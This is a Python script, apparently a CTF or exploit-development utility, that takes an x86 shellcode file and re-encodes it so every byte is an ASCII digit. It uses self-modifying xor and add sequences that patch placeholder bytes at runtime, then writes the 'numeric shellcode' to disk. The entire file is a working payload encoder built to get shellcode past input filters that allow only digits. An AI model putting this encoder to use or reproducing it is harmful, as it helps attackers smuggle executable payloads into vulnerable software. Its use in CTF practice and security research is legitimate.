#!/usr/bin/env python3

import sys

EDX = 0xffffffff
EBX = 0x0804c000
EAX = 0x08080000

CODE_START = EAX

DH = (EDX >> 8) & 0xff
BH = (EBX >> 8) & 0xff

INCR_PER_PAGE = 5
CMP_DEREF_EAX_DH = [ 0x38, 0x30 ]
XOR_DEREF_EAX_DH = [ 0x30, 0x30 ]
XOR_DH_DEREF_EAX = [ 0x32, 0x30 ]
XOR_BH_DEREF_EAX = [ 0x32, 0x38 ]
XOR_AL_IMM8 = [ 0x34 ]
XOR_EAX_IMM32 = [ 0x35 ]

INCR_HI_PLACEHOLDER = [ 0x30, 0x30 ] # after: 00 30 -- add byte ptr [eax], dh
INCR_LO_PLACEHOLDER = [ 0x30, 0x38 ] # after: 00 38 -- add byte ptr [eax], bh

CODE = []

def error(s):
    print("ERROR: " + s)
    exit(-1)

def emit(*args):
    global CODE
    for arg in args:
        if isinstance(arg, list):
            CODE += arg
        else:
            CODE.append(arg)

def pad(padlen):
    global CODE
    if len(CODE) & 1:
        error("odd code len, cant pad")
    if len(CODE) > padlen:
        error("padlen ahead of codelen (0x%x/0x%x)" % (padlen, len(CODE)))
    emit(CMP_DEREF_EAX_DH * int((padlen - len(CODE))/2))

def find_iters(want):
    best = -1
    bestv = None
    for startval in range(0x30, 0x3a):
        for incr_hi in range(0, 16):
            for incr_lo in range(0, 16):
                val = (startval + (incr_hi * DH) + (incr_lo * BH)) & 0xff
                if val == want:
                    if (incr_hi + incr_lo) < best or best == -1:
                        best = (incr_hi + incr_lo)
                        bestv = [ startval, incr_hi, incr_lo ]
    return bestv

def xor_eax(v):
    return XOR_EAX_IMM32 + [
        v & 0xff, (v >> 8) & 0xff, (v >> 16) & 0xff, (v >> 24) & 0xff
    ]

def incr_eax(old_value, new_value):
    global EAX

    axor = 0
    bxor = 0
    do_xor_al = False
    EAX = new_value

    if (old_value & 0x30) and (new_value & 0x30) == 0:
        new_value |= 0x30
        do_xor_al = True

    for i in range(4):
        old_nib = (old_value >> (i * 8)) & 0xff
        new_nib = (new_value >> (i * 8)) & 0xff

        done = False
        for a in range(0x30, 0x3a):
            if done:
                break
            for b in range(0x30, 0x3a):
                if done:
                    break
                if old_nib ^ a ^ b == new_nib:
                    axor |= (a << (i * 8))
                    bxor |= (b << (i * 8))
                    done = True
        if not done:
            return False

    o = xor_eax(axor) + xor_eax(bxor)

    if do_xor_al:
        o += XOR_AL_IMM8
        o += [ 0x30 ]

    return o

if len(sys.argv) != 3:
    print("usage: %s <shellcode.bin> <output.bin>" % sys.argv[0])
    exit(0)

emit(XOR_DEREF_EAX_DH) # *eax = 0xcf
emit(XOR_DH_DEREF_EAX) # dh = 0xff^0xcf == 0x30
emit(XOR_BH_DEREF_EAX) # bh = 0xc0^0xcf == 0x0f

tmp = 0x30 ^ DH
DH ^= tmp
BH ^= tmp

code_addr = EAX

emit(incr_eax(code_addr, code_addr + 0x100))
pad(0x100)

patch_page_cnt = 0

shellcode_bytes = open(sys.argv[1], "rb").read()

final_page = []
mutabytes = []

pos = 0

for v in shellcode_bytes:
    if v >= 0x30 and v <= 0x39:
        final_page.append(v)
        pos += 1
        continue
    r = find_iters(v)
    if r is None:
        error("could not find iter counts for value 0x%02x" % v)
    incr_cnt = r[1] + r[2]
    mutabytes.append(r + [pos])
    final_page.append(r[0])
    if incr_cnt % INCR_PER_PAGE != 0:
        incr_cnt += (INCR_PER_PAGE - (incr_cnt % INCR_PER_PAGE))
    patch_page_cnt += int(incr_cnt / INCR_PER_PAGE)
    pos += 1

print("[~] total patch pages: %d" % patch_page_cnt)

if patch_page_cnt > 0xe:
    error("too many patch pages (%d, max=14)" % patch_page_cnt)

final_page_addr = 0x100 + (patch_page_cnt * 0x100) 
page_addr = 0x100

for mutabyte in mutabytes:
    cnt_hi, cnt_lo, patch_offset = mutabyte[1:]

    mutations = [INCR_HI_PLACEHOLDER] * cnt_hi
    mutations += [INCR_LO_PLACEHOLDER] * cnt_lo

    while len(mutations) > 0:
        cnt_in_page = min(len(mutations), INCR_PER_PAGE)

        for i in range(cnt_in_page):
            emit(XOR_AL_IMM8, 0x30 + (i*2))
            emit(XOR_DEREF_EAX_DH)
            emit(XOR_AL_IMM8, 0x30 + (i*2))

        emit(incr_eax(EAX, CODE_START + final_page_addr + patch_offset))
        pad(page_addr + 0x30)

        for i in range(cnt_in_page):
            emit(mutations.pop(0))

        page_addr += 0x100
        emit(incr_eax(EAX, CODE_START + page_addr))
        pad(page_addr)

pad(final_page_addr)
CODE += final_page

fh = open(sys.argv[2], "wb")
fh.write(bytes(CODE))
fh.close()

print("[>] wrote numeric shellcode to '%s'" % sys.argv[2])
print("[~] old length: %d bytes, new length %d (size increase %.2f%%)" % (
    len(shellcode_bytes), len(CODE),
    float(len(CODE)) / (float(len(shellcode_bytes)) / float(100))
))
